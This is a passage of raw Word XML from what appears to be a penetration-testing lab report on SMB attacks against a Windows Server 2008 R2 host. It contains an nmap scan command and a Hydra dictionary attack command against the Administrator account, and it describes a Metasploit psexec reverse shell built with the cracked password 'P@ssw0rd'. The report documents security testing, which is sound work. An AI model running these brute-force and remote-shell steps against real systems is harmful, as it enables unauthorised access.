          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">-discovery and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">-security-mode scripts were used to reveal vulnerabilities associated with SMB and to find out information about its operating system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C98061" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4EFDE6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="31" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="34"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">efficient tool that executes dictionary-based authentication attacks against SMB services </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveal weak credentials. This enabled identification of real login details for the “Administrator” account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F59A4" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CEB06F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="264" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Used the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> module along with the stolen credentials to leverage SMB and achieve a Meterpreter reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25537395" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="111" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3387"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc23330"/>
      <w:r>
        <w:t xml:space="preserve">2.4.1 Technical Steps &amp; Screenshots </w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="0D85EC21" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="182" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="4731" w:hanging="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scan </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C06F06" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4731"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22702C7F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="409" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4277" w:firstLine="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O 192.168.135.129 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4467CC84" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="409" w:lineRule="auto"/>
        <w:ind w:right="3166"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">To scan for open ports, services, and OS fingerprinting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1DCFA0" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="162" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Open ports: 135, 139, 455, 1025-1033, 49152-49157 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB307A3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Services: Windows RPC, SMB, HTTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E38E23C" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">OS: Windows Server 2008 R2 Standard </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674C18D2" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="141" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55F15441" wp14:editId="263A2D96">
                <wp:extent cx="5817882" cy="3201935"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="20808" name="Group 20808"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5817882" cy="3201935"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5817882" cy="3201935"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2727" name="Rectangle 2727"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5786945" y="3015900"/>
                            <a:ext cx="41146" cy="247427"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7A7E8A3E" w14:textId="77777777" w:rsidR="0086222C"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731" name="Picture 2731"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId40"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="14288" y="14351"/>
                            <a:ext cx="5731510" cy="3095625"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="2732" name="Shape 2732"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5760085" cy="3124200"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5760085" h="3124200">
                                <a:moveTo>
                                  <a:pt x="0" y="3124200"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5760085" y="3124200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576008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808" style="width:458.101pt;height:252.121pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58178,32019">
                <v:rect id="Rectangle 2727" style="position:absolute;width:411;height:2474;left:57869;top:30159;"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2731" style="position:absolute;width:57315;height:30956;left:142;top:143;" filled="f">
                  <v:imagedata r:id="rId41"/>
                </v:shape>
                <v:shape id="Shape 2732" style="position:absolute;width:57600;height:31242;left:0;top:0;" coordsize="5760085,3124200" path="m0,3124200l5760085,3124200l5760085,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="381CF9BA" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D514B0F" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82A04C" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245C6574" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE74F12" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111B3BBB" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143C7F93" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F9BF086" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE46E32" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B57DAF" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D4A117" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D612866" w14:textId="4FCA4766" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4357B16A" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="409" w:lineRule="auto"/>
        <w:ind w:right="4731" w:hanging="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Brute Force using Hydra Command used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163DF9C4" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="409" w:lineRule="auto"/>
        <w:ind w:right="696"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> hydra -l Administrator -P /path/to/wordlist.txt smb://192.168.135.129 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A387E7" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="409" w:lineRule="auto"/>
        <w:ind w:right="3696"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">To identify valid login credentials using a wordlist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A18F7F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="193" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Valid credentials found: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0AC829" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="65" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Username: Administrator </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BADC29C" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="137" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20F3A385" wp14:editId="3DD4D87E">
                <wp:extent cx="5017783" cy="2970637"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="20059" name="Group 20059"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5017783" cy="2970637"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5017783" cy="2970637"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2785" name="Rectangle 2785"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="662241" y="37430"/>
                            <a:ext cx="93238" cy="185075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4D5DB137" w14:textId="77777777" w:rsidR="0086222C"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786" name="Rectangle 2786"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="732345" y="5176"/>
                            <a:ext cx="56314" cy="226001"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0D1AB6DA" w14:textId="77777777" w:rsidR="0086222C"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787" name="Rectangle 2787"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="890842" y="0"/>
                            <a:ext cx="1860713" cy="247427"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="03627EDC" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>Password:</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                  <w:spacing w:val="-5"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>P@ssw0rd</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2788" name="Rectangle 2788"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2291779" y="0"/>
                            <a:ext cx="41146" cy="247427"/>
                          </a:xfrm>
